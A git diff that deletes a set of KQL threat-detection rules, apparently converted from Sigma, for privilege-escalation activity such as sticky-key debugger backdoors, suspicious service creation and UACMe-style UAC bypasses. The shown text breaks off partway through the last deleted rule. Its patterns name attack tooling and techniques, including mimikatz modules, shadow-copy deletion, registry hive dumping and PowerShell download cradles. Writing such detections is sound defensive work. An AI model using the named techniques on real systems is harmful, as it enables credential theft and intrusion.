diff --git a/Privilege Escalation/Suspicious_Child_Process_Of_Veeam_Dabatase.kql b/Privilege Escalation/Suspicious_Child_Process_Of_Veeam_Dabatase.kql
deleted file mode 100644
index b9990b32..00000000
--- a/Privilege Escalation/Suspicious_Child_Process_Of_Veeam_Dabatase.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/05/04
-// Level: critical
-// Description: Detects suspicious child processes of the Veeam service process. This could indicate potential RCE or SQL Injection.
-// Tags: attack.initial_access, attack.persistence, attack.privilege_escalation
-DeviceProcessEvents
-| where (InitiatingProcessCommandLine contains "VEEAMSQL" and InitiatingProcessFolderPath endswith "\\sqlservr.exe") and (((ProcessCommandLine contains "-ex " or ProcessCommandLine contains "bypass" or ProcessCommandLine contains "cscript" or ProcessCommandLine contains "DownloadString" or ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://" or ProcessCommandLine contains "mshta" or ProcessCommandLine contains "regsvr32" or ProcessCommandLine contains "rundll32" or ProcessCommandLine contains "wscript" or ProcessCommandLine contains "copy ") and (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wsl.exe" or FolderPath endswith "\\wt.exe")) or (FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe" or FolderPath endswith "\\netstat.exe" or FolderPath endswith "\\nltest.exe" or FolderPath endswith "\\ping.exe" or FolderPath endswith "\\tasklist.exe" or FolderPath endswith "\\whoami.exe"))
\ No newline at end of file
diff --git a/Privilege Escalation/Suspicious_Child_Process_Of_Wermgr.EXE.kql b/Privilege Escalation/Suspicious_Child_Process_Of_Wermgr.EXE.kql
deleted file mode 100644
index b25dfd18..00000000
--- a/Privilege Escalation/Suspicious_Child_Process_Of_Wermgr.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/10/14
-// Level: high
-// Description: Detects suspicious Windows Error Reporting manager (wermgr.exe) child process
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1055, attack.t1036
-DeviceProcessEvents
-| where (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\ipconfig.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe" or FolderPath endswith "\\netstat.exe" or FolderPath endswith "\\nslookup.exe" or FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\systeminfo.exe" or FolderPath endswith "\\whoami.exe" or FolderPath endswith "\\wscript.exe") and InitiatingProcessFolderPath endswith "\\wermgr.exe"
\ No newline at end of file
diff --git a/Privilege Escalation/Suspicious_Debugger_Registration_Cmdline.kql b/Privilege Escalation/Suspicious_Debugger_Registration_Cmdline.kql
deleted file mode 100644
index 8a4f2a41..00000000
--- a/Privilege Escalation/Suspicious_Debugger_Registration_Cmdline.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro
-// Date: 2019/09/06
-// Level: high
-// Description: Detects the registration of a debugger for a program that is available in the logon screen (sticky key backdoor).
-// Tags: attack.persistence, attack.privilege_escalation, attack.t1546.008
-DeviceProcessEvents
-| where ProcessCommandLine contains "\\CurrentVersion\\Image File Execution Options\\" and (ProcessCommandLine contains "sethc.exe" or ProcessCommandLine contains "utilman.exe" or ProcessCommandLine contains "osk.exe" or ProcessCommandLine contains "magnify.exe" or ProcessCommandLine contains "narrator.exe" or ProcessCommandLine contains "displayswitch.exe" or ProcessCommandLine contains "atbroker.exe" or ProcessCommandLine contains "HelpPane.exe")
\ No newline at end of file
diff --git a/Privilege Escalation/Suspicious_NTLM_Authentication_on_the_Printer_Spooler_Service.kql b/Privilege Escalation/Suspicious_NTLM_Authentication_on_the_Printer_Spooler_Service.kql
deleted file mode 100644
index df06d4d8..00000000
--- a/Privilege Escalation/Suspicious_NTLM_Authentication_on_the_Printer_Spooler_Service.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Elastic (idea), Tobias Michalski (Nextron Systems)
-// Date: 2022/05/04
-// Level: high
-// Description: Detects a privilege elevation attempt by coercing NTLM authentication on the Printer Spooler service
-// Tags: attack.privilege_escalation, attack.credential_access, attack.t1212
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "spoolss" or ProcessCommandLine contains "srvsvc" or ProcessCommandLine contains "/print/pipe/") and (ProcessCommandLine contains "C:\\windows\\system32\\davclnt.dll,DavSetCookie" and ProcessCommandLine contains "http")) and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE")
\ No newline at end of file
diff --git a/Privilege Escalation/Suspicious_New_Service_Creation.kql b/Privilege Escalation/Suspicious_New_Service_Creation.kql
deleted file mode 100644
index 2450ee8b..00000000
--- a/Privilege Escalation/Suspicious_New_Service_Creation.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/07/14
-// Level: high
-// Description: Detects creation of a new service via "sc" command or the powershell "new-service" cmdlet with suspicious binary paths
-// Tags: attack.persistence, attack.privilege_escalation, attack.t1543.003
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "New-Service" and ProcessCommandLine contains "-BinaryPathName") or ((ProcessCommandLine contains "create" and ProcessCommandLine contains "binPath=") and FolderPath endswith "\\sc.exe")) and (ProcessCommandLine contains "powershell" or ProcessCommandLine contains "mshta" or ProcessCommandLine contains "wscript" or ProcessCommandLine contains "cscript" or ProcessCommandLine contains "svchost" or ProcessCommandLine contains "dllhost" or ProcessCommandLine contains "cmd " or ProcessCommandLine contains "cmd.exe /c" or ProcessCommandLine contains "cmd.exe /k" or ProcessCommandLine contains "cmd.exe /r" or ProcessCommandLine contains "rundll32" or ProcessCommandLine contains "C:\\Users\\Public" or ProcessCommandLine contains "\\Downloads\\" or ProcessCommandLine contains "\\Desktop\\" or ProcessCommandLine contains "\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\" or ProcessCommandLine contains "C:\\Windows\\TEMP\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp")
\ No newline at end of file
diff --git a/Privilege Escalation/Suspicious_Printer_Driver_Empty_Manufacturer.kql b/Privilege Escalation/Suspicious_Printer_Driver_Empty_Manufacturer.kql
deleted file mode 100644
index 02313ce1..00000000
--- a/Privilege Escalation/Suspicious_Printer_Driver_Empty_Manufacturer.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2020/07/01
-// Level: high
-// Description: Detects a suspicious printer driver installation with an empty Manufacturer value
-// Tags: attack.privilege_escalation, attack.t1574, cve.2021.1675
-DeviceRegistryEvents
-| where (RegistryValueData =~ "(Empty)" and (RegistryKey contains "\\Control\\Print\\Environments\\Windows x64\\Drivers" and RegistryKey contains "\\Manufacturer")) and (not((RegistryKey contains "\\CutePDF Writer v4.0" or RegistryKey contains "\\Version-3\\PDF24" or (RegistryKey contains "\\VNC Printer (PS)" or RegistryKey contains "\\VNC Printer (UD)"))))
\ No newline at end of file
diff --git a/Privilege Escalation/Suspicious_Processes_Spawned_by_Java.EXE.kql b/Privilege Escalation/Suspicious_Processes_Spawned_by_Java.EXE.kql
deleted file mode 100644
index 7ac4d66c..00000000
--- a/Privilege Escalation/Suspicious_Processes_Spawned_by_Java.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Andreas Hunkeler (@Karneades), Florian Roth
-// Date: 2021/12/17
-// Level: high
-// Description: Detects suspicious processes spawned from a Java host process which could indicate a sign of exploitation (e.g. log4j)
-// Tags: attack.initial_access, attack.persistence, attack.privilege_escalation
-DeviceProcessEvents
-| where (FolderPath endswith "\\AppVLP.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\curl.exe" or FolderPath endswith "\\forfiles.exe" or FolderPath endswith "\\hh.exe" or FolderPath endswith "\\mftrace.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe" or FolderPath endswith "\\query.exe" or FolderPath endswith "\\reg.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\scrcons.exe" or FolderPath endswith "\\scriptrunner.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\systeminfo.exe" or FolderPath endswith "\\whoami.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\wscript.exe") and InitiatingProcessFolderPath endswith "\\java.exe"
\ No newline at end of file
diff --git a/Privilege Escalation/Suspicious_Processes_Spawned_by_WinRM.kql b/Privilege Escalation/Suspicious_Processes_Spawned_by_WinRM.kql
deleted file mode 100644
index 156ae6e7..00000000
--- a/Privilege Escalation/Suspicious_Processes_Spawned_by_WinRM.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Andreas Hunkeler (@Karneades), Markus Neis
-// Date: 2021/05/20
-// Level: high
-// Description: Detects suspicious processes including shells spawnd from WinRM host process
-// Tags: attack.t1190, attack.initial_access, attack.persistence, attack.privilege_escalation
-DeviceProcessEvents
-| where (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\bash.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wsl.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\whoami.exe" or FolderPath endswith "\\bitsadmin.exe") and InitiatingProcessFolderPath endswith "\\wsmprovhost.exe"
\ No newline at end of file
diff --git a/Privilege Escalation/Suspicious_RunAs-Like_Flag_Combination.kql b/Privilege Escalation/Suspicious_RunAs-Like_Flag_Combination.kql
deleted file mode 100644
index 20bd7e66..00000000
--- a/Privilege Escalation/Suspicious_RunAs-Like_Flag_Combination.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/11/11
-// Level: medium
-// Description: Detects suspicious command line flags that let the user set a target user and command as e.g. seen in PsExec-like tools
-// Tags: attack.privilege_escalation
-DeviceProcessEvents
-| where (ProcessCommandLine contains " -c cmd" or ProcessCommandLine contains " -c \"cmd" or ProcessCommandLine contains " -c powershell" or ProcessCommandLine contains " -c \"powershell" or ProcessCommandLine contains " --command cmd" or ProcessCommandLine contains " --command powershell" or ProcessCommandLine contains " -c whoami" or ProcessCommandLine contains " -c wscript" or ProcessCommandLine contains " -c cscript") and (ProcessCommandLine contains " -u system " or ProcessCommandLine contains " --user system " or ProcessCommandLine contains " -u NT" or ProcessCommandLine contains " -u \"NT" or ProcessCommandLine contains " -u 'NT" or ProcessCommandLine contains " --system " or ProcessCommandLine contains " -u administrator ")
\ No newline at end of file
diff --git a/Privilege Escalation/Suspicious_SYSTEM_User_Process_Creation.kql b/Privilege Escalation/Suspicious_SYSTEM_User_Process_Creation.kql
deleted file mode 100644
index 76673450..00000000
--- a/Privilege Escalation/Suspicious_SYSTEM_User_Process_Creation.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), David ANDRE (additional keywords)
-// Date: 2021/12/20
-// Level: high
-// Description: Detects a suspicious process creation as SYSTEM user (suspicious program or command line parameter)
-// Tags: attack.credential_access, attack.defense_evasion, attack.privilege_escalation, attack.t1134, attack.t1003, attack.t1027
-DeviceProcessEvents
-| where ((ProcessIntegrityLevel =~ "System" and (AccountName contains "AUTHORI" or AccountName contains "AUTORI")) and ((FolderPath endswith "\\calc.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\hh.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\forfiles.exe" or FolderPath endswith "\\ping.exe") or (ProcessCommandLine contains " -NoP " or ProcessCommandLine contains " -W Hidden " or ProcessCommandLine contains " -decode " or ProcessCommandLine contains " /decode " or ProcessCommandLine contains " /urlcache " or ProcessCommandLine contains " -urlcache " or (ProcessCommandLine contains " -e" and ProcessCommandLine contains " JAB") or (ProcessCommandLine contains " -e" and ProcessCommandLine contains " SUVYI") or (ProcessCommandLine contains " -e" and ProcessCommandLine contains " SQBFAFgA") or (ProcessCommandLine contains " -e" and ProcessCommandLine contains " aWV4I") or (ProcessCommandLine contains " -e" and ProcessCommandLine contains " IAB") or (ProcessCommandLine contains " -e" and ProcessCommandLine contains " PAA") or (ProcessCommandLine contains " -e" and ProcessCommandLine contains " aQBlAHgA") or ProcessCommandLine contains "vssadmin delete shadows" or ProcessCommandLine contains "reg SAVE HKLM" or ProcessCommandLine contains " -ma " or ProcessCommandLine contains "Microsoft\\Windows\\CurrentVersion\\Run" or ProcessCommandLine contains ".downloadstring(" or ProcessCommandLine contains ".downloadfile(" or ProcessCommandLine contains " /ticket:" or ProcessCommandLine contains "dpapi::" or ProcessCommandLine contains "event::clear" or ProcessCommandLine contains "event::drop" or ProcessCommandLine contains "id::modify" or ProcessCommandLine contains "kerberos::" or ProcessCommandLine contains "lsadump::" or ProcessCommandLine contains "misc::" or ProcessCommandLine contains "privilege::" or ProcessCommandLine contains "rpc::" or ProcessCommandLine contains "sekurlsa::" or ProcessCommandLine contains "sid::" or ProcessCommandLine contains "token::" or ProcessCommandLine contains "vault::cred" or ProcessCommandLine contains "vault::list" or ProcessCommandLine contains " p::d " or ProcessCommandLine contains ";iex(" or ProcessCommandLine contains "MiniDump" or ProcessCommandLine contains "net user "))) and (not((InitiatingProcessFolderPath contains ":\\Packages\\Plugins\\Microsoft.GuestConfiguration.ConfigurationforWindows\\" or (ProcessCommandLine contains " -ma " and (FolderPath contains ":\\Program Files (x86)\\Java\\" or FolderPath contains ":\\Program Files\\Java\\") and FolderPath endswith "\\bin\\jp2launcher.exe" and (InitiatingProcessFolderPath contains ":\\Program Files (x86)\\Java\\" or InitiatingProcessFolderPath contains ":\\Program Files\\Java\\") and InitiatingProcessFolderPath endswith "\\bin\\javaws.exe") or ProcessCommandLine =~ "ping 127.0.0.1 -n 5" or (FolderPath endswith "\\PING.EXE" and InitiatingProcessCommandLine contains "\\DismFoDInstall.cmd"))))
\ No newline at end of file
diff --git a/Privilege Escalation/Suspicious_ScreenSave_Change_by_Reg.exe.kql b/Privilege Escalation/Suspicious_ScreenSave_Change_by_Reg.exe.kql
deleted file mode 100644
index d7bc0338..00000000
--- a/Privilege Escalation/Suspicious_ScreenSave_Change_by_Reg.exe.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: frack113
-// Date: 2021/08/19
-// Level: medium
-// Description: Adversaries may establish persistence by executing malicious content triggered by user inactivity.
-Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension
-
-// Tags: attack.privilege_escalation, attack.t1546.002
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "HKEY_CURRENT_USER\\Control Panel\\Desktop" or ProcessCommandLine contains "HKCU\\Control Panel\\Desktop") and FolderPath endswith "\\reg.exe") and ((ProcessCommandLine contains "/v ScreenSaveActive" and ProcessCommandLine contains "/t REG_SZ" and ProcessCommandLine contains "/d 1" and ProcessCommandLine contains "/f") or (ProcessCommandLine contains "/v ScreenSaveTimeout" and ProcessCommandLine contains "/t REG_SZ" and ProcessCommandLine contains "/d " and ProcessCommandLine contains "/f") or (ProcessCommandLine contains "/v ScreenSaverIsSecure" and ProcessCommandLine contains "/t REG_SZ" and ProcessCommandLine contains "/d 0" and ProcessCommandLine contains "/f") or (ProcessCommandLine contains "/v SCRNSAVE.EXE" and ProcessCommandLine contains "/t REG_SZ" and ProcessCommandLine contains "/d " and ProcessCommandLine contains ".scr" and ProcessCommandLine contains "/f"))
\ No newline at end of file
diff --git a/Privilege Escalation/Suspicious_Service_Path_Modification.kql b/Privilege Escalation/Suspicious_Service_Path_Modification.kql
deleted file mode 100644
index f0c3811c..00000000
--- a/Privilege Escalation/Suspicious_Service_Path_Modification.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Victor Sergeev, oscd.community, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2019/10/21
-// Level: high
-// Description: Detects service path modification via the "sc" binary to a suspicious command or path
-// Tags: attack.persistence, attack.privilege_escalation, attack.t1543.003
-DeviceProcessEvents
-| where (ProcessCommandLine contains "powershell" or ProcessCommandLine contains "cmd " or ProcessCommandLine contains "mshta" or ProcessCommandLine contains "wscript" or ProcessCommandLine contains "cscript" or ProcessCommandLine contains "rundll32" or ProcessCommandLine contains "svchost" or ProcessCommandLine contains "dllhost" or ProcessCommandLine contains "cmd.exe /c" or ProcessCommandLine contains "cmd.exe /k" or ProcessCommandLine contains "cmd.exe /r" or ProcessCommandLine contains "cmd /c" or ProcessCommandLine contains "cmd /k" or ProcessCommandLine contains "cmd /r" or ProcessCommandLine contains "C:\\Users\\Public" or ProcessCommandLine contains "\\Downloads\\" or ProcessCommandLine contains "\\Desktop\\" or ProcessCommandLine contains "\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\" or ProcessCommandLine contains "C:\\Windows\\TEMP\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp") and (ProcessCommandLine contains "config" and ProcessCommandLine contains "binPath") and FolderPath endswith "\\sc.exe"
\ No newline at end of file
diff --git a/Privilege Escalation/Suspicious_Shells_Spawn_by_Java_Utility_Keytool.kql b/Privilege Escalation/Suspicious_Shells_Spawn_by_Java_Utility_Keytool.kql
deleted file mode 100644
index a6b5d758..00000000
--- a/Privilege Escalation/Suspicious_Shells_Spawn_by_Java_Utility_Keytool.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Andreas Hunkeler (@Karneades)
-// Date: 2021/12/22
-// Level: high
-// Description: Detects suspicious shell spawn from Java utility keytool process (e.g. adselfservice plus exploitation)
-// Tags: attack.initial_access, attack.persistence, attack.privilege_escalation
-DeviceProcessEvents
-| where (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\bash.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\whoami.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\scrcons.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\hh.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\forfiles.exe" or FolderPath endswith "\\scriptrunner.exe" or FolderPath endswith "\\mftrace.exe" or FolderPath endswith "\\AppVLP.exe" or FolderPath endswith "\\systeminfo.exe" or FolderPath endswith "\\reg.exe" or FolderPath endswith "\\query.exe") and InitiatingProcessFolderPath endswith "\\keytool.exe"
\ No newline at end of file
diff --git a/Privilege Escalation/Suspicious_Spool_Service_Child_Process.kql b/Privilege Escalation/Suspicious_Spool_Service_Child_Process.kql
deleted file mode 100644
index 9e6385cb..00000000
--- a/Privilege Escalation/Suspicious_Spool_Service_Child_Process.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Justin C. (@endisphotic), @dreadphones (detection), Thomas Patzke (Sigma rule)
-// Date: 2021/07/11
-// Level: high
-// Description: Detects suspicious print spool service (spoolsv.exe) child processes.
-// Tags: attack.execution, attack.t1203, attack.privilege_escalation, attack.t1068
-DeviceProcessEvents
-| where (ProcessIntegrityLevel =~ "System" and InitiatingProcessFolderPath endswith "\\spoolsv.exe") and ((FolderPath endswith "\\gpupdate.exe" or FolderPath endswith "\\whoami.exe" or FolderPath endswith "\\nltest.exe" or FolderPath endswith "\\taskkill.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\taskmgr.exe" or FolderPath endswith "\\sc.exe" or FolderPath endswith "\\findstr.exe" or FolderPath endswith "\\curl.exe" or FolderPath endswith "\\wget.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\accesschk.exe" or FolderPath endswith "\\wevtutil.exe" or FolderPath endswith "\\bcdedit.exe" or FolderPath endswith "\\fsutil.exe" or FolderPath endswith "\\cipher.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\write.exe" or FolderPath endswith "\\wuauclt.exe" or FolderPath endswith "\\systeminfo.exe" or FolderPath endswith "\\reg.exe" or FolderPath endswith "\\query.exe") or ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") and (not(ProcessCommandLine contains "start"))) or (FolderPath endswith "\\cmd.exe" and (not((ProcessCommandLine contains ".spl" or ProcessCommandLine contains "route add" or ProcessCommandLine contains "program files")))) or (FolderPath endswith "\\netsh.exe" and (not((ProcessCommandLine contains "add portopening" or ProcessCommandLine contains "rule name")))) or ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") and (not(ProcessCommandLine contains ".spl"))) or (ProcessCommandLine endswith "rundll32.exe" and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE")))
\ No newline at end of file
diff --git a/Privilege Escalation/Third_Party_Software_DLL_Sideloading.kql b/Privilege Escalation/Third_Party_Software_DLL_Sideloading.kql
deleted file mode 100644
index 15cbb1e6..00000000
--- a/Privilege Escalation/Third_Party_Software_DLL_Sideloading.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)
-// Date: 2022/08/17
-// Level: medium
-// Description: Detects DLL sideloading of DLLs that are part of third party software (zoom, discord....etc)
-// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where (FolderPath endswith "\\commfunc.dll" and (not((FolderPath contains "\\AppData\\local\\Google\\Chrome\\Application\\" or (FolderPath startswith "C:\\Program Files\\Lenovo\\Communications Utility\\" or FolderPath startswith "C:\\Program Files (x86)\\Lenovo\\Communications Utility\\"))))) or (FolderPath endswith "\\tosbtkbd.dll" and (not((FolderPath startswith "C:\\Program Files\\Toshiba\\Bluetooth Toshiba Stack\\" or FolderPath startswith "C:\\Program Files (x86)\\Toshiba\\Bluetooth Toshiba Stack\\"))))
\ No newline at end of file
diff --git a/Privilege Escalation/UAC_Bypass_Abusing_Winsat_Path_Parsing_-_File.kql b/Privilege Escalation/UAC_Bypass_Abusing_Winsat_Path_Parsing_-_File.kql
deleted file mode 100644
index 8d57f867..00000000
--- a/Privilege Escalation/UAC_Bypass_Abusing_Winsat_Path_Parsing_-_File.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021/08/30
-// Level: high
-// Description: Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceFileEvents
-| where (FolderPath endswith "\\AppData\\Local\\Temp\\system32\\winsat.exe" or FolderPath endswith "\\AppData\\Local\\Temp\\system32\\winmm.dll") and FolderPath startswith "C:\\Users\\"
\ No newline at end of file
diff --git a/Privilege Escalation/UAC_Bypass_Abusing_Winsat_Path_Parsing_-_Process.kql b/Privilege Escalation/UAC_Bypass_Abusing_Winsat_Path_Parsing_-_Process.kql
deleted file mode 100644
index 503d8c5f..00000000
--- a/Privilege Escalation/UAC_Bypass_Abusing_Winsat_Path_Parsing_-_Process.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021/08/30
-// Level: high
-// Description: Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceProcessEvents
-| where (ProcessIntegrityLevel in~ ("High", "System")) and InitiatingProcessCommandLine contains "C:\\Windows \\system32\\winsat.exe" and InitiatingProcessFolderPath endswith "\\AppData\\Local\\Temp\\system32\\winsat.exe"
\ No newline at end of file
diff --git a/Privilege Escalation/UAC_Bypass_Abusing_Winsat_Path_Parsing_-_Registry.kql b/Privilege Escalation/UAC_Bypass_Abusing_Winsat_Path_Parsing_-_Registry.kql
deleted file mode 100644
index 979b06ac..00000000
--- a/Privilege Escalation/UAC_Bypass_Abusing_Winsat_Path_Parsing_-_Registry.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021/08/30
-// Level: high
-// Description: Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceRegistryEvents
-| where RegistryValueData endswith "\\appdata\\local\\temp\\system32\\winsat.exe" and RegistryValueData startswith "c:\\users\\" and RegistryKey contains "\\Root\\InventoryApplicationFile\\winsat.exe|" and RegistryKey endswith "\\LowerCaseLongPath"
\ No newline at end of file
diff --git a/Privilege Escalation/UAC_Bypass_Tools_Using_ComputerDefaults.kql b/Privilege Escalation/UAC_Bypass_Tools_Using_ComputerDefaults.kql
deleted file mode 100644
index ba29c60d..00000000
--- a/Privilege Escalation/UAC_Bypass_Tools_Using_ComputerDefaults.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021/08/31
-// Level: high
-// Description: Detects tools such as UACMe used to bypass UAC with computerdefaults.exe (UACMe 59)
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceProcessEvents
-| where (FolderPath =~ "C:\\Windows\\System32\\ComputerDefaults.exe" and (ProcessIntegrityLevel in~ ("High", "System"))) and (not((InitiatingProcessFolderPath contains ":\\Windows\\System32" or InitiatingProcessFolderPath contains ":\\Program Files")))
\ No newline at end of file
diff --git a/Privilege Escalation/UAC_Bypass_Using_.NET_Code_Profiler_on_MMC.kql b/Privilege Escalation/UAC_Bypass_Using_.NET_Code_Profiler_on_MMC.kql
deleted file mode 100644
index f8815880..00000000
--- a/Privilege Escalation/UAC_Bypass_Using_.NET_Code_Profiler_on_MMC.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021/08/30
-// Level: high
-// Description: Detects the pattern of UAC Bypass using .NET Code Profiler and mmc.exe DLL hijacking (UACMe 39)
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceFileEvents
-| where FolderPath endswith "\\AppData\\Local\\Temp\\pe386.dll" and FolderPath startswith "C:\\Users\\"
\ No newline at end of file
diff --git a/Privilege Escalation/UAC_Bypass_Using_ChangePK_and_SLUI.kql b/Privilege Escalation/UAC_Bypass_Using_ChangePK_and_SLUI.kql
deleted file mode 100644
index c912f517..00000000
--- a/Privilege Escalation/UAC_Bypass_Using_ChangePK_and_SLUI.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021/08/23
-// Level: high
-// Description: Detects an UAC bypass that uses changepk.exe and slui.exe (UACMe 61)
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceProcessEvents
-| where FolderPath endswith "\\changepk.exe" and (ProcessIntegrityLevel in~ ("High", "System")) and InitiatingProcessFolderPath endswith "\\slui.exe"
\ No newline at end of file
diff --git a/Privilege Escalation/UAC_Bypass_Using_Consent_and_Comctl32_-_File.kql b/Privilege Escalation/UAC_Bypass_Using_Consent_and_Comctl32_-_File.kql
deleted file mode 100644
index c45c8dd3..00000000
--- a/Privilege Escalation/UAC_Bypass_Using_Consent_and_Comctl32_-_File.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021/08/23
-// Level: high
-// Description: Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceFileEvents
-| where FolderPath endswith "\\comctl32.dll" and FolderPath startswith "C:\\Windows\\System32\\consent.exe.@"
\ No newline at end of file
diff --git a/Privilege Escalation/UAC_Bypass_Using_Consent_and_Comctl32_-_Process.kql b/Privilege Escalation/UAC_Bypass_Using_Consent_and_Comctl32_-_Process.kql
deleted file mode 100644
index b14f6498..00000000
--- a/Privilege Escalation/UAC_Bypass_Using_Consent_and_Comctl32_-_Process.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021/08/23
-// Level: high
-// Description: Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceProcessEvents
-| where FolderPath endswith "\\werfault.exe" and (ProcessIntegrityLevel in~ ("High", "System")) and InitiatingProcessFolderPath endswith "\\consent.exe"
\ No newline at end of file
diff --git a/Privilege Escalation/UAC_Bypass_Using_Disk_Cleanup.kql b/Privilege Escalation/UAC_Bypass_Using_Disk_Cleanup.kql
deleted file mode 100644
index 949e3b2b..00000000
--- a/Privilege Escalation/UAC_Bypass_Using_Disk_Cleanup.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021/08/30
-// Level: high
-// Description: Detects the pattern of UAC Bypass using scheduled tasks and variable expansion of cleanmgr.exe (UACMe 34)
